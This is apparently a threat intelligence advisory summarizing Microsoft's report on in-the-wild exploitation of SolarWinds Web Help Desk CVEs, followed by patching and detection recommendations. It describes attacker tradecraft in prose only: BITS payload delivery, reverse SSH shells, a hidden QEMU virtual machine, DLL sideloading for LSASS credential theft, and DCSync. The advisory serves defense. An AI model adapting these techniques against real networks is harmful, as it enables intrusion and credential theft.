SolarWinds WHD Under Active Attack

Microsoft observed active, in-the-wild exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances beginning in December 2025. Attackers leveraged unpatched vulnerabilities to gain unauthenticated remote code execution (RCE), followed by stealthy lateral movement and escalation that, in some cases, led to full domain compromise. The campaign emphasizes the high risk posed by exposed enterprise management applications and the continued effectiveness of living-off-the-land (LotL) techniques.

Severity: High

Threat Details

1. Initial Access and Vulnerabilities Exploited

Attackers exploited public-facing WHD servers using vulnerabilities including:

• CVE-2025-40551 – Critical untrusted data deserialization leading to RCE
• CVE-2025-40536 – Security control bypass
• CVE-2025-26399 – Previously disclosed WHD vulnerability
  Because the observed compromises occurred on systems vulnerable to both older and newer CVEs, Microsoft could not definitively attribute initial access to a single flaw.

2. Post-Exploitation Activity

After compromising WHD, attackers:

• Spawned PowerShell processes from the WHD service
• Used BITS (Background Intelligent Transfer Service) to download and execute additional payloads
• Installed ManageEngine (Zoho) RMM components (e.g., ToolsIQ.exe) to maintain interactive control and persistent access
  This use of legitimate tooling reflects a living-off-the-land (LotL) strategy designed to evade traditional signature-based detections.

3. Lateral Movement and Persistence

The attackers demonstrated deliberate and stealthy movement inside victim environments:

• Domain reconnaissance, including enumeration of privileged users and groups such as Domain Admins
• Establishment of reverse SSH shells, SSH tunneling, and RDP sessions for lateral movement
• Creation of scheduled tasks that launched a QEMU virtual machine under the SYSTEM account at startup, effectively hiding attacker activity inside a virtualized environment while exposing SSH access via port forwarding.

4. Credential Access and Privilege Escalation

• DLL sideloading via wab.exe to load a malicious sspicli.dll, enabling LSASS credential theft with reduced detection.
• In at least one case, attackers escalated to DCSync, enabling replication of Active Directory credentials.

Recommendations

1. Immediately patch SolarWinds Web Help Desk to address CVE-2025-40551, CVE-2025-40536 and CVE-2025-26399.
2. Remove public access to WHD admin paths.
3. Increase logging and monitoring on WHD components (e.g., Ajax Proxy).
4. Hunt for and remove unauthorized ManageEngine RMM artifacts introduced post-compromise.
5. Rotate credentials immediately after suspected or confirmed compromise, prioritizing:
   • WHD service accounts
   • Domain Admin and privileged accounts reachable from WHD
6. Monitor and alert on DCSync attempts, anomalous directory replication requests, and abnormal privileged group enumeration.
7. Block or alert on WHD spawning PowerShell and abuse of BITS for payload delivery.
8. Enable LSASS protection and credential guard where supported.

Source:

• https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.